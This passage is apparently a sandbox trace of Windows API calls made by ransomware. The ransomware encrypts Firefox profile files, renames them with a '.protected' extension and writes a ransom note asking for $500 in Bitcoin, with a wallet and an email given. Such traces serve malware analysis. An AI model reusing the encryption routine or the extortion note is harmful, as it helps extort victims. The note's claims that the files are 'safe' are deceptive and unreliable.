(lpString1="test-phish-simple.cache", lpString2="Windows") returned -1 [0086.561] lstrcmpiW (lpString1="test-phish-simple.cache", lpString2="Program Files") returned 1 [0086.561] lstrcmpiW (lpString1="test-phish-simple.cache", lpString2="Program Files (x86)") returned 1 [0086.561] lstrcmpiW (lpString1="test-phish-simple.cache", lpString2="$Recycle.bin") returned 1 [0086.561] lstrcmpiW (lpString1="test-phish-simple.cache", lpString2="System Volume Information") returned 1 [0086.561] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache") returned 126 [0086.561] StrStrIW (lpFirst="test-phish-simple.cache", lpSrch=".protected") returned 0x0 [0086.561] lstrcmpW (lpString1="test-phish-simple.cache", lpString2="RESTORE_FILES.txt") returned 1 [0086.561] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.561] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.563] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache") returned 126 [0086.563] StrStrW (lpFirst="test-phish-simple.cache", lpSrch=".txt") returned 0x0 [0086.563] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache") returned 126 [0086.563] StrStrW (lpFirst="test-phish-simple.cache", lpSrch=".rar") returned 0x0 [0086.563] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache") returned 126 [0086.563] StrStrW (lpFirst="test-phish-simple.cache", lpSrch=".zip") returned 0x0 [0086.563] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2c, lpOverlapped=0x0) returned 1 [0086.564] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.564] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2c, lpOverlapped=0x0) returned 1 [0086.564] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.565] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.565] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.565] CloseHandle (hObject=0x158) returned 1 [0086.565] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.protected") returned 136 [0086.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.protected")) returned 1 [0086.566] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.566] lstrcmpiW (lpString1="test-phish-simple.pset", lpString2="Windows") returned -1 [0086.566] lstrcmpiW (lpString1="test-phish-simple.pset", lpString2="Program Files") returned 1 [0086.566] lstrcmpiW (lpString1="test-phish-simple.pset", lpString2="Program Files (x86)") returned 1 [0086.566] lstrcmpiW (lpString1="test-phish-simple.pset", lpString2="$Recycle.bin") returned 1 [0086.566] lstrcmpiW (lpString1="test-phish-simple.pset", lpString2="System Volume Information") returned 1 [0086.566] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset") returned 125 [0086.566] StrStrIW (lpFirst="test-phish-simple.pset", lpSrch=".protected") returned 0x0 [0086.566] lstrcmpW (lpString1="test-phish-simple.pset", lpString2="RESTORE_FILES.txt") returned 1 [0086.566] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.566] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset") returned 125 [0086.567] StrStrW (lpFirst="test-phish-simple.pset", lpSrch=".txt") returned 0x0 [0086.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset") returned 125 [0086.567] StrStrW (lpFirst="test-phish-simple.pset", lpSrch=".rar") returned 0x0 [0086.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset") returned 125 [0086.567] StrStrW (lpFirst="test-phish-simple.pset", lpSrch=".zip") returned 0x0 [0086.567] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0086.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.568] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0086.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.568] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.569] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.569] CloseHandle (hObject=0x158) returned 1 [0086.569] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.protected") returned 135 [0086.569] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.protected")) returned 1 [0086.570] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="Windows") returned -1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="Program Files") returned 1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="Program Files (x86)") returned 1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="$Recycle.bin") returned 1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="System Volume Information") returned 1 [0086.570] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore") returned 128 [0086.570] StrStrIW (lpFirst="test-phish-simple.sbstore", lpSrch=".protected") returned 0x0 [0086.570] lstrcmpW (lpString1="test-phish-simple.sbstore", lpString2="RESTORE_FILES.txt") returned 1 [0086.570] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.570] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.571] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore") returned 128 [0086.571] StrStrW (lpFirst="test-phish-simple.sbstore", lpSrch=".txt") returned 0x0 [0086.571] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore") returned 128 [0086.571] StrStrW (lpFirst="test-phish-simple.sbstore", lpSrch=".rar") returned 0x0 [0086.571] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore") returned 128 [0086.571] StrStrW (lpFirst="test-phish-simple.sbstore", lpSrch=".zip") returned 0x0 [0086.571] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0xe8, lpOverlapped=0x0) returned 1 [0086.572] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.572] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0xe8, lpOverlapped=0x0) returned 1 [0086.572] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.572] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.572] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.572] CloseHandle (hObject=0x158) returned 1 [0086.572] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.protected") returned 138 [0086.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.protected")) returned 1 [0086.573] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.573] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.573] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\RESTORE_FILES.txt") returned 120 [0086.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.574] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.574] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.575] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.575] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.575] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.575] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0086.575] CloseHandle (hObject=0x154) returned 1 [0086.575] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="Windows") returned -1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="Program Files") returned 1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="Program Files (x86)") returned 1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="$Recycle.bin") returned 1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="System Volume Information") returned -1 [0086.576] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache") returned 102 [0086.576] lstrcmpW (lpString1="startupCache", lpString2=".") returned 1 [0086.576] lstrcmpW (lpString1="startupCache", lpString2="..") returned 1 [0086.576] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\*") returned 104 [0086.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.576] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.577] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.577] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.577] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.577] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\.") returned 104 [0086.577] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.577] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.577] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.577] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.577] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.577] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.577] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\..") returned 105 [0086.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.577] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="Windows") returned -1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="Program Files") returned 1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="Program Files (x86)") returned 1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="$Recycle.bin") returned 1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="System Volume Information") returned -1 [0086.577] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little") returned 124 [0086.577] StrStrIW (lpFirst="startupCache.4.little", lpSrch=".protected") returned 0x0 [0086.577] lstrcmpW (lpString1="startupCache.4.little", lpString2="RESTORE_FILES.txt") returned 1 [0086.577] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.577] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.578] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little") returned 124 [0086.578] StrStrW (lpFirst="startupCache.4.little", lpSrch=".txt") returned 0x0 [0086.578] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little") returned 124 [0086.578] StrStrW (lpFirst="startupCache.4.little", lpSrch=".rar") returned 0x0 [0086.578] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little") returned 124 [0086.578] StrStrW (lpFirst="startupCache.4.little", lpSrch=".zip") returned 0x0 [0086.578] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.588] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.588] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.589] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.589] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.597] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.598] CloseHandle 